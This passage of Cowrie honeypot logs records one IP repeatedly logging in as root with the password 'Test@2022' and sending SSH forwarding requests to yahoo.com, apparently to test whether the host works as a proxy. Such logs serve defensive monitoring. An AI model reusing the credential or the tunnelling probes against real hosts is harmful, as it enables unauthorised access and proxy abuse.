{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.353131Z","src_ip":"213.209.150.239","session":"a0e7893750cb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20814,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3397e762b6d","protocol":"ssh","message":"New connection: 213.209.150.239:20814 (1.2.3.4:22) [session: a3397e762b6d]","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.399173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.400196Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.447466Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.683895Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28518,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28518","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.732860Z","session":"a3397e762b6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.780257Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":20077,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20077","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.917603Z","session":"a3397e762b6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:58.965295Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.013348Z","src_ip":"213.209.150.239","session":"a3397e762b6d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20868,"dst_ip":"1.2.3.4","dst_port":22,"session":"95d14017706c","protocol":"ssh","message":"New connection: 213.209.150.239:20868 (1.2.3.4:22) [session: 95d14017706c]","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.059475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.068345Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.107143Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.342946Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":11377,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11377","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.391558Z","session":"95d14017706c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.439372Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17321,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17321","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.577580Z","session":"95d14017706c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.625056Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.674260Z","src_ip":"213.209.150.239","session":"95d14017706c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20912,"dst_ip":"1.2.3.4","dst_port":22,"session":"886ab823830c","protocol":"ssh","message":"New connection: 213.209.150.239:20912 (1.2.3.4:22) [session: 886ab823830c]","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.720449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.721480Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:59.768728Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.004507Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5903,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5903","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.053087Z","session":"886ab823830c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.100546Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":4091,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4091","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.237784Z","session":"886ab823830c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.285519Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.333755Z","src_ip":"213.209.150.239","session":"886ab823830c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":20958,"dst_ip":"1.2.3.4","dst_port":22,"session":"08bc9b84fc8f","protocol":"ssh","message":"New connection: 213.209.150.239:20958 (1.2.3.4:22) [session: 08bc9b84fc8f]","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.379982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.389812Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.427461Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.663362Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17839,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17839","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.712429Z","session":"08bc9b84fc8f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.759709Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9831,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9831","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.897612Z","session":"08bc9b84fc8f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.944895Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:00.992934Z","src_ip":"213.209.150.239","session":"08bc9b84fc8f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21003,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e0b60692354","protocol":"ssh","message":"New connection: 213.209.150.239:21003 (1.2.3.4:22) [session: 2e0b60692354]","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.048563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.049616Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.106153Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.388170Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13720,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13720","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.445974Z","session":"2e0b60692354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.502919Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29068,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29068","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.659213Z","session":"2e0b60692354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.716331Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.773923Z","src_ip":"213.209.150.239","session":"2e0b60692354"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21076,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cbf0b60cf22","protocol":"ssh","message":"New connection: 213.209.150.239:21076 (1.2.3.4:22) [session: 4cbf0b60cf22]","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.829575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.830742Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"